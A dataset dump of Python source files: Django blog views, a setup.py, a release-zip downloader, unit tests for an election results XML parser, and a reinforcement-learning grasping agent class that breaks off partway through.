| id (string, length 1-265) | text (string, length 6-5.19M) | dataset_id (string, 7 classes) |
|---|---|---|
1756488 | <filename>posts/views.py
from django.core.paginator import Paginator
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from django.contrib import messages
from django.http import HttpResponseForbidden
from django.urls import reverse_lazy
from django.contrib.auth.models import User
from .models import Post, Comment
from .forms import CommentForm, UpdateCommentForm
from bootstrap_modal_forms.generic import BSModalUpdateView, BSModalDeleteView
def get_posts(request):
"""
    Create a view that returns a list of posts
    published prior to 'now' and renders them
    to the 'blogposts.html' template.
"""
post_list = Post.objects.filter(
published_date__lte=timezone.now()).order_by('-published_date')
paginator = Paginator(post_list, 6)
page = request.GET.get('page')
posts = paginator.get_page(page)
context = {
'posts': posts,
'blogs_page': 'active',
        'title': 'Blogs'
}
return render(request, "blogposts.html", context)
def post_detail(request, pk):
"""
    Create a view that returns the selected post, its associated
    comments and a comment form for the user to leave comments.
"""
post = get_object_or_404(Post, pk=pk)
post.views += 1
post.save()
comments = Comment.objects.order_by('-created_date')
users = User.objects.all().select_related('profiles')
comment = None
# Processing post requests
if request.method == 'POST':
if not request.user.is_authenticated:
return redirect('accounts:login')
comment_form = CommentForm(request.POST)
if comment_form.is_valid():
            comment = comment_form.save(commit=False)
comment.post = post
comment.owner = request.user
comment.save()
messages.success(
request,
"Thank you for commenting! Your comment is being reviewed"
)
return redirect('posts:post_detail', pk=post.pk)
else:
comment_form = CommentForm()
context = {
'comments': comments,
'users': users,
'comment_form': comment_form,
'post': post,
'title': 'Blog'
}
return render(request, "postdetail.html", context)
class CommentUpdateView(BSModalUpdateView):
"""
Update comment using django-bootstrap-modal-forms package.
    The form_valid method is overridden to get the correct success_url.
    The saved instance is used to get the parent post id for the url path,
    returning to the postdetail page after update.
"""
model = Comment
template_name = 'edit_comment.html'
form_class = UpdateCommentForm
def form_valid(self, form):
        instance = form.save()
self.success_url = reverse_lazy(
'posts:post_detail',
kwargs={'pk': instance.post.id}
)
return super(CommentUpdateView, self).form_valid(form)
class CommentDeleteView(BSModalDeleteView):
"""
Delete comment using django-bootstrap-modal-forms package.
    The get_success_url method is used to get the correct path back
    to the postdetail page after delete. The method uses the related
    post object to get the correct parent post id.
"""
model = Comment
template_name = 'delete_comment.html'
    success_message = 'Success! Comment was deleted.'
def get_success_url(self):
        post_id = self.object.post.id
        return reverse_lazy('posts:post_detail', kwargs={'pk': post_id})
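# Illustrative sketch only: CommentForm and UpdateCommentForm live in .forms and
# are not shown in this file. Based on how they are used above (a single
# 'content' field saved onto Comment), they might look roughly like the
# ModelForm below; anything beyond the 'content' field is an assumption.
from django import forms as _forms
class _SketchCommentForm(_forms.ModelForm):
    class Meta:
        model = Comment
        fields = ('content',)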
| StarcoderdataPython |
1773407 | <gh_stars>0
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="short-chn-yn",
version="0.0.2",
author="cltian",
author_email="<EMAIL>",
description="Short Chinses literal YES or NO recognition by logic",
long_description=long_description,
url="https://github.com/foowaa/short-chn-yn/",
packages=find_packages(),
classifiers=[
"Programming Language :: Python :: 3.7",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Natural Language :: Chinese (Simplified)",
"Development Status :: 3 - Alpha",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
],
package_data = {
'': ['*.txt', '*.rst'],
},
keywords = "Chinese, NLP"
) | StarcoderdataPython |
67943 | #
# Copyright (c) 2015 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import subprocess
from constants import PLATFORM_PARENT_PATH
from constants import TAP_REPOS_URL
from lib.logger import LOGGER
class ReleaseDownloader:
def __init__(self, app_info):
self.name = app_info['name']
self.snapshot = app_info.get('snapshot')
self.url = app_info.get('url')
self.sources_path = os.path.join(PLATFORM_PARENT_PATH, self.name)
self.zip_name = '{}.zip'.format(app_info.get('zip_name', self.name))
self.logs_directory_path = os.path.join(PLATFORM_PARENT_PATH, 'logs')
if not os.path.exists(self.logs_directory_path):
os.makedirs(self.logs_directory_path)
self.build_log_path = os.path.join(self.logs_directory_path, self.name + '-build.log')
self.err_log_path = os.path.join(self.logs_directory_path, self.name + '-err.log')
def download_release_zip(self, dest_path):
if not self.url:
            LOGGER.error('No release url specified for %s', self.name)
            raise ValueError('No release url specified for {}'.format(self.name))
LOGGER.info('Downloading release package for %s from %s', self.name, self.url)
with open(self.build_log_path, 'a') as build_log, \
open(self.err_log_path, 'a') as err_log:
try:
subprocess.check_call(['wget', '-O', os.path.join(dest_path, '{}.zip'.format(self.name)), self.url], stdout=build_log, stderr=err_log)
except Exception as e:
LOGGER.error('Cannot download release package for %s project', self.name)
raise e
LOGGER.info('Release package has been downloaded for %s project', self.name)
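if __name__ == '__main__':
    # Illustrative usage only: the keys below mirror how app_info is read in
    # __init__ above, but the name and URL are made-up examples.
    example_app_info = {
        'name': 'example-app',
        'url': 'https://example.com/releases/example-app.zip',
        'zip_name': 'example-app',
    }
    downloader = ReleaseDownloader(example_app_info)
    downloader.download_release_zip(PLATFORM_PARENT_PATH)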
| StarcoderdataPython |
3270788 | import datetime
import unittest
import lxml.etree
from clarify.parser import (Parser, ResultJurisdiction)
class TestParser(unittest.TestCase):
def test__underscore_to_camel(self):
self.assertEqual(Parser._underscore_to_camel(""), "")
self.assertEqual(Parser._underscore_to_camel("test"), "test")
self.assertEqual(Parser._underscore_to_camel("test_again"), "testAgain")
self.assertEqual(Parser._underscore_to_camel("test_again_but_longer"), "testAgainButLonger")
self.assertEqual(Parser._underscore_to_camel("_test_again"), "TestAgain") # XXX: Is this what we expect?
self.assertEqual(Parser._underscore_to_camel("testing_123"), "testing123")
self.assertEqual(Parser._underscore_to_camel("testing_123_again"), "testing123Again")
def test__parse_result_jurisdiction(self):
tag_name = "County"
attributes = {
"name": "Arkansas",
"totalVoters": "10196",
"ballotsCast": "5137",
"voterTurnout": "50.38",
"percentReporting": "100.00",
"precinctsParticipating": "30",
"precinctsReported": "30",
"precinctsReportingPercent": "100.00",
}
result_jurisdiction_element = lxml.etree.Element(tag_name, attributes)
result_jurisdiction = Parser._parse_result_jurisdiction(result_jurisdiction_element)
self.assertIsInstance(result_jurisdiction, ResultJurisdiction)
self.assertTrue(hasattr(result_jurisdiction, "level"))
self.assertTrue(hasattr(result_jurisdiction, "name"))
self.assertTrue(hasattr(result_jurisdiction, "total_voters"))
self.assertTrue(hasattr(result_jurisdiction, "ballots_cast"))
self.assertTrue(hasattr(result_jurisdiction, "voter_turnout"))
self.assertTrue(hasattr(result_jurisdiction, "percent_reporting"))
self.assertTrue(hasattr(result_jurisdiction, "precincts_participating"))
self.assertTrue(hasattr(result_jurisdiction, "precincts_reported"))
self.assertTrue(hasattr(result_jurisdiction, "precincts_reporting_percent"))
self.assertEqual(result_jurisdiction.level, tag_name.lower())
self.assertEqual(result_jurisdiction.name, attributes["name"])
self.assertEqual(result_jurisdiction.total_voters, int(attributes["totalVoters"]))
self.assertEqual(result_jurisdiction.ballots_cast, int(attributes["ballotsCast"]))
self.assertEqual(result_jurisdiction.voter_turnout, float(attributes["voterTurnout"]))
self.assertEqual(result_jurisdiction.percent_reporting, float(attributes["percentReporting"]))
self.assertEqual(result_jurisdiction.precincts_participating, float(attributes["precinctsParticipating"]))
self.assertEqual(result_jurisdiction.precincts_reported, float(attributes["precinctsReported"]))
self.assertEqual(result_jurisdiction.precincts_reporting_percent, float(attributes["precinctsReportingPercent"]))
def test__get_or_create_result_jurisdiction(self):
result_jurisdiction_name = "Test"
result_jurisdiction_element = lxml.etree.Element("County", { "name": result_jurisdiction_name })
result_jurisdiction = Parser._parse_result_jurisdiction(result_jurisdiction_element)
parser = Parser()
self.assertEqual(parser._result_jurisdictions, [])
self.assertEqual(parser._result_jurisdiction_lookup, {})
# Test the "create" part.
parser._get_or_create_result_jurisdiction(result_jurisdiction_element)
self.assertEqual(parser._result_jurisdictions, [ result_jurisdiction ])
self.assertEqual(parser._result_jurisdiction_lookup, { result_jurisdiction_name: result_jurisdiction })
# Test the "get" part.
parser._get_or_create_result_jurisdiction(result_jurisdiction_element)
self.assertEqual(parser._result_jurisdictions, [ result_jurisdiction ])
self.assertEqual(parser._result_jurisdiction_lookup, { result_jurisdiction_name: result_jurisdiction })
def test_add_result_jurisdiction(self):
result_jurisdiction_name = "Test"
result_jurisdiction = ResultJurisdiction(
name=result_jurisdiction_name,
total_voters=0,
ballots_cast=0,
voter_turnout=100.0,
percent_reporting=100.0,
precincts_participating=0,
precincts_reported=0,
precincts_reporting_percent=100.0,
level="county",
)
parser = Parser()
self.assertEqual(parser._result_jurisdictions, [])
self.assertEqual(parser._result_jurisdiction_lookup, {})
parser.add_result_jurisdiction(result_jurisdiction)
self.assertEqual(parser._result_jurisdictions, [ result_jurisdiction ])
self.assertEqual(parser._result_jurisdiction_lookup, { result_jurisdiction_name: result_jurisdiction })
class TestPrecinctParser(unittest.TestCase):
def test_parse(self):
num_precincts = 33
num_candidates = 5
# Overvotes and undervotes
num_pseudo_candidates = 2
num_expected_results = (
num_candidates * (num_precincts + 1) +
num_pseudo_candidates * (num_precincts + 1)
)
er = Parser()
er.parse('tests/data/precinct.xml')
self.assertEqual(er.timestamp.replace(tzinfo=None), datetime.datetime(2014, 5, 20, 20, 19, 21))
self.assertEqual(er.election_name, "2014 Primary Election")
self.assertEqual(er.election_date, datetime.date(2014, 5, 20))
self.assertEqual(er.region, "Greenup")
self.assertEqual(er.total_voters, 28162)
self.assertEqual(er.ballots_cast, 5926)
self.assertEqual(er.voter_turnout, 21.04)
self.assertEqual(len(er.result_jurisdictions), num_precincts)
precinct = next(p for p in er.result_jurisdictions if p.name == 'A105')
self.assertEqual(precinct.total_voters, 0)
self.assertEqual(precinct.ballots_cast, 171)
self.assertEqual(precinct.voter_turnout, 0)
self.assertEqual(precinct.percent_reporting, 4)
self.assertEqual(len(er.contests), 1)
self.assertEqual(len(er.results), num_expected_results)
result_jurisdiction_name = "A105"
result_jurisdiction = er.get_result_jurisdiction(result_jurisdiction_name)
self.assertEqual(str(result_jurisdiction), result_jurisdiction_name)
self.assertEqual(result_jurisdiction.name, result_jurisdiction_name)
self.assertEqual(result_jurisdiction.total_voters, 0)
self.assertEqual(result_jurisdiction.ballots_cast, 171)
self.assertEqual(result_jurisdiction.voter_turnout, 0)
self.assertEqual(result_jurisdiction.percent_reporting, 4)
self.assertEqual(result_jurisdiction, precinct)
contest_text = "US Senator - REPUBLICAN"
contest = er.get_contest(contest_text)
self.assertEqual(str(contest), contest_text)
self.assertEqual(contest.text, contest_text)
self.assertEqual(contest.key, "4")
self.assertEqual(contest.vote_for, 1)
self.assertFalse(contest.is_question)
self.assertEqual(contest.precincts_reporting, 32)
self.assertEqual(contest.precincts_reported, 32)
contest_choice_text = "<NAME>"
contest_choice = contest.choices[0]
self.assertEqual(contest_choice.contest, contest)
self.assertEqual(str(contest_choice), contest_choice_text)
self.assertEqual(contest_choice.text, contest_choice_text)
self.assertEqual(contest_choice.key, "1")
self.assertEqual(contest_choice.total_votes, 820)
class TestCountyParser(unittest.TestCase):
def test_parse(self):
num_counties = 75
num_candidates = 1
# Election
num_vote_types = 4
num_expected_results = (
(num_vote_types * num_counties * num_candidates) +
(num_vote_types * num_candidates)
)
er = Parser()
er.parse('tests/data/county.xml')
self.assertEqual(er.timestamp.replace(tzinfo=None), datetime.datetime(2014, 11, 13, 14, 58, 41))
self.assertEqual(er.election_name, "2014 General Election")
self.assertEqual(er.election_date, datetime.date(2014, 11, 4))
self.assertEqual(er.region, "AR")
self.assertEqual(er.total_voters, 1690577)
self.assertEqual(er.ballots_cast, 850615)
self.assertEqual(er.voter_turnout, 50.32)
self.assertEqual(len(er.result_jurisdictions), num_counties)
county = next(c for c in er.result_jurisdictions if c.name == 'Arkansas')
self.assertEqual(county.total_voters, 10196)
self.assertEqual(county.ballots_cast, 5137)
self.assertEqual(county.voter_turnout, 50.38)
self.assertEqual(county.precincts_participating, 30)
self.assertEqual(county.precincts_reporting_percent, 100.0)
self.assertEqual(len(er.contests), 1)
self.assertEqual(len(er.results), num_expected_results)
result_jurisdiction_name = "Arkansas"
result_jurisdiction = er.get_result_jurisdiction(result_jurisdiction_name)
self.assertEqual(str(result_jurisdiction), result_jurisdiction_name)
self.assertEqual(result_jurisdiction.name, result_jurisdiction_name)
self.assertEqual(result_jurisdiction.total_voters, 10196)
self.assertEqual(result_jurisdiction.ballots_cast, 5137)
self.assertEqual(result_jurisdiction.voter_turnout, 50.38)
self.assertEqual(result_jurisdiction.precincts_participating, 30)
self.assertEqual(result_jurisdiction.precincts_reported, 30)
self.assertEqual(result_jurisdiction.precincts_reporting_percent, 100.0)
self.assertEqual(result_jurisdiction, county)
contest_text = "U.S. Senate"
contest = er.get_contest(contest_text)
self.assertEqual(str(contest), contest_text)
self.assertEqual(contest.text, contest_text)
self.assertEqual(contest.key, "100")
self.assertEqual(contest.vote_for, 1)
self.assertFalse(contest.is_question)
self.assertEqual(contest.counties_participating, 75)
self.assertEqual(contest.counties_reported, 75)
self.assertEqual(contest.precincts_participating, 2655)
self.assertEqual(contest.precincts_reported, 2655)
contest_choice_text = "<NAME>"
contest_choice = contest.choices[0]
self.assertEqual(contest_choice.contest, contest)
self.assertEqual(str(contest_choice), contest_choice_text)
self.assertEqual(contest_choice.text, contest_choice_text)
self.assertEqual(contest_choice.key, "001")
self.assertEqual(contest_choice.party, "REP")
self.assertEqual(contest_choice.total_votes, 477734)
| StarcoderdataPython |
35879 | # --------------------------------------------------------
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
import os
import torch
import torch.nn.functional as F
import numpy as np
from core import networks
from core.utils import *
from core.loss import *
import IPython
import time
class Agent(object):
"""
A general agent class
"""
def __init__(self, num_inputs, action_space, args, name):
for key, val in args.items():
setattr(self, key, val)
self.name = name
self.device = "cuda"
self.update_step = 1
self.init_step = 1
self.action_dim = action_space.shape[0]
self.has_critic = self.name != "BC"
self.action_space = action_space
self.num_inputs = num_inputs + self.num_input_extra
self.traj_feat = None
self.latent_sample = None
self.test_mode = False
self.use_debug_latent = False
self.gaddpg_pred = 0.
if has_check(self, 'traj_goal_mutual_conditioned') :
self.num_inputs += self.policy_traj_latent_size
self.policy, self.policy_optim, self.policy_scheduler, self.policy_target = get_policy_class('GaussianPolicy', self)
def unpack_batch(
self,
state,
point_state=None,
vis=False,
gt_goal=None,
val=False,
grasp_set=None,
vis_image=False,
repeat=False,
traj_latent=None,
separate=True
):
"""
Extract features from point cloud input
"""
if type(point_state) is list or type(point_state) is np.ndarray:
point_state = torch.cuda.FloatTensor(point_state )
if type(state) is list or type(state) is np.ndarray:
state = torch.cuda.FloatTensor(state)
state_feature, network_input = self.state_feature_extractor(
point_state,
feature_2=val,
traj_latent=traj_latent,
train=not self.test_mode)
if len(state_feature) != 2 or type(state_feature) is torch.Tensor: state_feature = [state_feature, None]
return state_feature
def gaddpg_step(self, state, remain_timestep, curr_joint ):
""" use GADDPG to forward pass """
state = select_target_point(state)
gaddpg_remain_step = max(min(remain_timestep + 1, 25), 1)
return self.gaddpg.select_action(state, remain_timestep=gaddpg_remain_step, curr_joint=curr_joint)
@torch.no_grad()
def batch_select_action(
self,
state,
actions=None,
goal_state=None,
vis=False,
remain_timestep=0,
repeat=False,
curr_joint=None,
gt_traj=None,
sample_num=None
):
"""
run policy forward pass in batch simulation
"""
self.set_mode(True)
traj = None
curr_joint_th = torch.cuda.FloatTensor(curr_joint)[:, :7]
img_state = torch.cuda.FloatTensor(state[0][1])
point_state = torch.cuda.FloatTensor(state[0][0])
timestep = remain_timestep
self.timestep = timestep
agent = self
feature, extra = agent.extract_feature( img_state,
point_state,
time_batch=timestep,
goal_batch=goal_state,
vis=vis,
value=False,
train=False,
repeat=repeat,
curr_joint=curr_joint_th )
actions = agent.policy.sample(feature)
action = actions[0].detach().cpu().numpy()
extra_pred = actions[1].detach().cpu().numpy()
action_sample = actions[2].detach().cpu().numpy()
aux_pred = actions[3].detach().cpu().numpy()
return action, traj, extra_pred, aux_pred
@torch.no_grad()
def select_action(
self,
state,
actions=None,
goal_state=None,
vis=False,
remain_timestep=0,
repeat=False,
curr_joint=None,
gt_traj=None,
sample_num=None
):
"""
policy output in test time
"""
self.set_mode(True)
multi_sample = has_check(self, 'multi_traj_sample') and gt_traj is None
if multi_sample and hasattr(self, 'critic') and self.train_traj_sampler and self.critic_mpc:
return self.critic_select_action(state, remain_timestep, curr_joint, vis=vis)
if self.name == 'DQN_HRL' and gt_traj is None and vis:
return self.critic_select_action(state, remain_timestep, curr_joint, vis=vis)
curr_joint_th = torch.Tensor([curr_joint.flatten()]).float().cuda()[:, :7]
img_state = torch.cuda.FloatTensor(state[0][1])[None]
point_state = torch.cuda.FloatTensor(state[0][0])[None]
timestep = torch.cuda.FloatTensor([remain_timestep])
self.timestep = timestep
if has_check(self, 'train_traj_sampler') and gt_traj is None and has_check(self, 'train_traj_feature'):
if multi_sample: # multiple traj samples
traj = self.select_traj(img_state,
point_state.repeat((self.test_traj_num, 1, 1)),
goal_state,
vis=vis,
remain_timestep=remain_timestep,
curr_joint=curr_joint_th.repeat((self.test_traj_num, 1)))
timestep = torch.Tensor([remain_timestep]).float().cuda()
opt_idx = 0
self.traj_feat = self.traj_feat[[opt_idx]]
else:
traj = self.select_traj(img_state, point_state, goal_state,
vis=vis, remain_timestep=remain_timestep,
curr_joint=curr_joint_th )
else:
traj = None
# policy
feature, extra = self.extract_feature( img_state,
point_state,
time_batch=timestep,
goal_batch=goal_state,
value=False,
train=False,
repeat=repeat,
curr_joint=curr_joint_th[:,:7] )
if self.name == 'DQN_HRL' and vis and hasattr(self, 'sampler_traj_feat'):
self.compute_critic_value( img_state, point_state, timestep, curr_joint_th, goal_state)
actions = self.policy.sample(feature)
action = actions[0].detach().cpu().numpy()[0]
extra_pred = actions[1].detach().cpu().numpy()[0]
action_sample = actions[2].detach().cpu().numpy()[0]
aux_pred = actions[3].detach().cpu().numpy()[0]
return action, traj, extra_pred, aux_pred
def update_parameters(self, batch_data, updates, k):
"""
To be inherited
"""
return {}
def compute_loss(self):
"""
compute loss for policy and trajectory embedding
"""
self.policy_grasp_aux_loss = goal_pred_loss(self.aux_pred[self.target_goal_reward_mask, :7], self.target_grasp_batch[self.target_goal_reward_mask, :7] )
self.bc_loss = traj_action_loss(self, self.pi, self.traj_expert_action_batch, self.target_expert_mask)
return sum([getattr(self, name) for name in self.loss_info if name.endswith('loss') and not name.startswith('critic')])
def prepare_data(self, batch_data):
"""
load batch data dictionary and compute extra data
"""
update_step = self.update_step - self.init_step
self.loss_info = list(get_loss_info_dict().keys())
for name in self.loss_info:
setattr(self, name, torch.zeros(1, device=torch.device('cuda')))
for k, v in batch_data.items():
setattr(self, k, torch.cuda.FloatTensor(v))
self.traj_time_batch = self.traj_idx_batch[:, 1, None]
self.cont_traj_inbatch_index = self.traj_idx_batch[:, 0].cuda().long()
self.traj_feat = None
self.reward_mask = (self.return_batch > 0).view(-1)
self.expert_mask = (self.expert_flag_batch >= 1).view(-1)
self.expert_reward_mask = self.reward_mask * (self.expert_flag_batch >= 1).squeeze()
self.perturb_flag_batch = self.perturb_flag_batch.bool()
self.traj_expert_reward_mask = self.expert_reward_mask[self.cont_traj_inbatch_index]
self.train_traj_idx_batch = self.cont_traj_inbatch_index
self.sparsify_sim_traj_time_batch = self.sparsify_sim_traj_idx_batch[:, 1, None]
self.sparsify_sim_cont_traj_inbatch_index = self.sparsify_sim_traj_idx_batch[:, 0].cuda().long()
self.sparsify_sim_traj_expert_reward_mask = self.expert_reward_mask[self.sparsify_sim_cont_traj_inbatch_index]
self.goal_reward_mask = torch.ones_like(self.time_batch).bool()
self.traj_goal_reward_mask = torch.ones_like(self.traj_integer_time_batch).bool()
self.target_grasp_batch = self.traj_goal_batch[:, :7] if self.full_traj_embedding else self.goal_batch[:, :7]
self.target_goal_reward_mask = self.goal_reward_mask[self.cont_traj_inbatch_index] if self.full_traj_embedding else self.goal_reward_mask
self.target_reward_mask = self.reward_mask[self.cont_traj_inbatch_index] if self.full_traj_embedding else self.reward_mask
self.target_return = self.return_batch[self.cont_traj_inbatch_index] if self.full_traj_embedding else self.return_batch
self.target_expert_mask = self.expert_mask[self.cont_traj_inbatch_index] if self.full_traj_embedding else self.expert_mask
self.target_gaddpg_batch = (self.gaddpg_batch * self.reward_mask)
self.target_expert_reward_mask = self.traj_expert_reward_mask if self.full_traj_embedding else self.expert_reward_mask
self.next_time_batch = self.time_batch - 1
self.next_traj_time_batch = self.traj_integer_time_batch - 1
self.target_reward_batch = self.traj_reward_batch if self.full_traj_embedding else self.reward_batch
self.target_mask_batch = self.traj_mask_batch if self.full_traj_embedding else self.mask_batch
def log_stat(self):
"""
log grad and param statistics for tensorboard
"""
self.policy_grad = module_max_gradient(self.policy)
self.feat_grad = module_max_gradient(self.state_feature_extractor.module.encoder)
self.feat_param = module_max_param(self.state_feature_extractor.module.encoder)
self.val_feat_grad = module_max_gradient(self.state_feature_extractor.module.value_encoder)
self.val_feat_param = module_max_param(self.state_feature_extractor.module.value_encoder)
self.policy_param = module_max_param(self.policy)
self.reward_mask_num = self.reward_mask.float().sum()
self.max_traj_sample_len = torch.unique(self.cont_traj_inbatch_index, return_counts=True)[1].max()
self.traj_num = len(self.reward_mask)
self.train_batch_size = len(self.target_expert_reward_mask)
if hasattr(self, 'traj_feature_extractor'):
self.traj_grad = module_max_gradient(self.traj_feature_extractor)
self.traj_param = module_max_param(self.traj_feature_extractor)
if hasattr(self, 'sampler_gaussian'):
self.sampler_mean = self.sampler_gaussian[0].mean().item()
self.sampler_logsigma = self.sampler_gaussian[1].mean().item()
if self.train_traj_sampler and hasattr(self, 'sampler_traj_feat'):
self.traj_sampler_grad = module_max_gradient(self.traj_feature_sampler)
self.traj_sampler_param = module_max_param(self.traj_feature_sampler)
if self.has_critic:
self.value_mean, self.value_mean_2 = self.qf1.mean(), self.qf2.mean()
self.target_mean = self.next_q_value.mean()
self.return_mean = self.traj_return_batch.mean()
self.value_min, self.value_max = self.qf1.min(), self.qf1.max()
self.expert_reward_mask_num = self.expert_reward_mask.sum()
self.goal_reward_mask_num = self.goal_reward_mask.sum()
self.reward_mask_num = self.reward_mask.sum()
self.return_min, self.return_max = self.return_batch.min(), self.return_batch.max()
self.critic_grad = module_max_gradient(self.critic)
self.critic_param = module_max_param(self.critic)
def set_mode(self, test):
"""
set training or test mode for network
"""
self.test_mode = test
if not test:
self.state_feature_extractor.train()
self.policy.train()
if hasattr(self, "critic"):
self.critic.train()
self.critic_optim.zero_grad()
self.state_feat_val_encoder_optim.zero_grad()
if hasattr(self, 'traj_feature_extractor'):
if self.train_traj_feature and not self.fix_traj_feature:
self.traj_feature_extractor.train()
else:
self.traj_feature_extractor.eval()
if self.train_traj_sampler:
self.traj_feature_sampler.train()
else:
torch.no_grad()
self.policy.eval()
self.state_feature_extractor.eval()
if hasattr(self, "critic"): self.critic.eval()
if hasattr(self, "traj_feature_extractor"): self.traj_feature_extractor.eval()
if hasattr(self, "traj_feature_sampler"): self.traj_feature_sampler.eval()
def setup_feature_extractor(self, net_dict, test_time=False):
"""
Load networks
"""
if "traj_feature_extractor" in net_dict:
self.traj_feature_extractor = net_dict["traj_feature_extractor"]["net"]
self.traj_feature_extractor_opt = net_dict["traj_feature_extractor"]["opt"]
self.traj_feature_extractor_sch = net_dict["traj_feature_extractor"]["scheduler"]
else:
self.traj_feature_extractor = net_dict["state_feature_extractor"]["net"]
if 'traj_feature_sampler' in net_dict:
self.traj_feature_sampler = net_dict["traj_feature_sampler"]["net"]
self.traj_feature_sampler_opt = net_dict["traj_feature_sampler"]["opt"]
self.traj_feature_sampler_sch = net_dict["traj_feature_sampler"]["scheduler"]
self.state_feature_extractor = net_dict["state_feature_extractor"]["net"]
self.state_feature_extractor_optim = net_dict["state_feature_extractor"]["opt"]
self.state_feature_extractor_scheduler = net_dict["state_feature_extractor"]["scheduler"]
self.state_feat_encoder_optim = net_dict["state_feature_extractor"][ "encoder_opt" ]
self.state_feat_encoder_scheduler = net_dict["state_feature_extractor"][ "encoder_scheduler" ]
self.state_feat_val_encoder_optim = net_dict["state_feature_extractor"][ "val_encoder_opt" ]
self.state_feat_val_encoder_scheduler = net_dict["state_feature_extractor"][ "val_encoder_scheduler" ]
self.test_time = test_time
def get_mix_ratio(self, update_step):
"""
Get a mixed schedule for supervised learning and RL
"""
idx = int((self.update_step > np.array(self.mix_milestones)).sum())
mix_policy_ratio = get_valid_index(self.mix_policy_ratio_list, idx)
mix_policy_ratio = min(mix_policy_ratio, self.ddpg_coefficients[4])
mix_value_ratio = get_valid_index(self.mix_value_ratio_list, idx)
mix_value_ratio = min(mix_value_ratio, self.ddpg_coefficients[3])
return mix_value_ratio, mix_policy_ratio
def get_lr(self):
"""
Get network learning rates
"""
lrs = {
"policy_lr": self.policy_optim.param_groups[0]["lr"],
"feature_lr": self.state_feature_extractor_optim.param_groups[0]["lr"],
}
if self.train_traj_feature:
lrs["traj_feature_lr"] = self.traj_feature_extractor_opt.param_groups[0]["lr"]
if self.train_traj_sampler:
lrs["traj_sampler_lr"] = self.traj_feature_sampler_opt.param_groups[0]["lr"]
if hasattr(self, 'critic_optim'):
lrs["value_lr"] = self.critic_optim.param_groups[0]["lr"]
lrs["val_feat_lr"] = self.state_feat_val_encoder_optim.param_groups[0]["lr"]
headers = ["network", "learning rate"]
data = [(name, lr) for name, lr in lrs.items()]
return lrs
def optimize(self, loss, update_step):
"""
Backward loss and update optimizer
"""
self.state_feat_encoder_optim.zero_grad()
self.policy_optim.zero_grad()
if self.train_traj_feature:
self.traj_feature_extractor_opt.zero_grad()
if self.train_traj_sampler:
self.traj_feature_sampler_opt.zero_grad()
loss.backward(retain_graph=self.re_sampler_step)
self.policy_optim.step()
if self.train_feature:
self.state_feat_encoder_optim.step()
if self.train_traj_feature:
self.traj_feature_extractor_opt.step()
if self.train_traj_sampler:
self.traj_feature_sampler_opt.step()
def step_scheduler(self, step=None):
"""
Update network scheduler
"""
if self.train_traj_sampler:
self.traj_feature_sampler_sch.step()
if self.train_traj_feature:
self.traj_feature_extractor_sch.step()
if hasattr(self, "critic"):
self.critic_scheduler.step()
if hasattr(self, "policy"):
self.policy_scheduler.step()
if self.train_feature or self.train_value_feature:
self.state_feature_extractor_scheduler.step()
self.state_feat_encoder_scheduler.step()
if self.train_value_feature and hasattr(self, 'state_feat_val_encoder_scheduler'):
self.state_feat_val_encoder_scheduler.step()
def save_model(
self,
step,
output_dir="",
surfix="latest",
actor_path=None,
critic_path=None,
traj_feat_path=None,
state_feat_path=None,
):
"""
save model
"""
if not os.path.exists(output_dir):
os.makedirs(output_dir)
actor_path, critic_path, traj_feat_path, traj_sampler_path, state_feat_path = get_model_path(output_dir,
self.name, self.env_name, surfix)
print("Saving models to {} and {}".format(actor_path, critic_path))
if hasattr(self, "policy"):
torch.save(
{
"net": self.policy.state_dict(),
"opt": self.policy_optim.state_dict(),
"sch": self.policy_scheduler.state_dict(),
},
actor_path,
)
if hasattr(self, "critic"):
torch.save(
{
"net": self.critic.state_dict(),
"opt": self.critic_optim.state_dict(),
"sch": self.critic_scheduler.state_dict(),
},
critic_path,
)
if hasattr(self, 'traj_feature_extractor_opt'):
torch.save(
{
"net": self.traj_feature_extractor.state_dict(),
"opt": self.traj_feature_extractor_opt.state_dict(),
"sch": self.traj_feature_extractor_sch.state_dict(),
},
traj_feat_path,
)
if hasattr(self, 'traj_feature_sampler_opt'):
torch.save(
{
"net": self.traj_feature_sampler.state_dict(),
"opt": self.traj_feature_sampler_opt.state_dict(),
"sch": self.traj_feature_sampler_sch.state_dict(),
},
traj_sampler_path,
)
torch.save(
{
"net": self.state_feature_extractor.state_dict(),
"opt": self.state_feature_extractor_optim.state_dict(),
"encoder_opt": self.state_feat_encoder_optim.state_dict(),
"sch": self.state_feature_extractor_scheduler.state_dict(),
"encoder_sch": self.state_feat_encoder_scheduler.state_dict(),
"val_encoder_opt": self.state_feat_val_encoder_optim.state_dict(),
"val_encoder_sch": self.state_feat_val_encoder_scheduler.state_dict(),
"step": step,
},
state_feat_path,
)
def load_model(
self, output_dir, surfix="latest", set_init_step=False, reinit_value_feat=False
):
"""
Load saved model
"""
actor_path, critic_path, traj_feat_path, traj_sampler_path, state_feat_path = get_model_path(output_dir,
self.name, self.env_name, surfix)
if hasattr(self, "policy") and os.path.exists(actor_path):
net_dict = torch.load(actor_path)
self.policy.load_state_dict(net_dict["net"])
self.policy_optim.load_state_dict(net_dict["opt"])
self.policy_scheduler.load_state_dict(net_dict["sch"])
if self.reinit_optim and set_init_step:
for g in self.policy_optim.param_groups:
g["lr"] = self.reinit_lr
self.policy_scheduler = torch.optim.lr_scheduler.MultiStepLR(
self.policy_optim, milestones=self.policy_milestones, gamma=0.5 )
self.policy_scheduler.initial_lr = self.reinit_lr
self.policy_scheduler.base_lrs[0] = self.reinit_lr
print("reinit policy optim")
print("load policy weight: {:.3f} from {} !!!!".format(module_max_param(self.policy), actor_path))
hard_update(self.policy_target, self.policy, self.tau)
if hasattr(self, "critic") and os.path.exists(critic_path):
net_dict = torch.load(critic_path)
self.critic.load_state_dict(net_dict["net"])
self.critic_optim.load_state_dict(net_dict["opt"])
self.critic_scheduler.load_state_dict(net_dict["sch"])
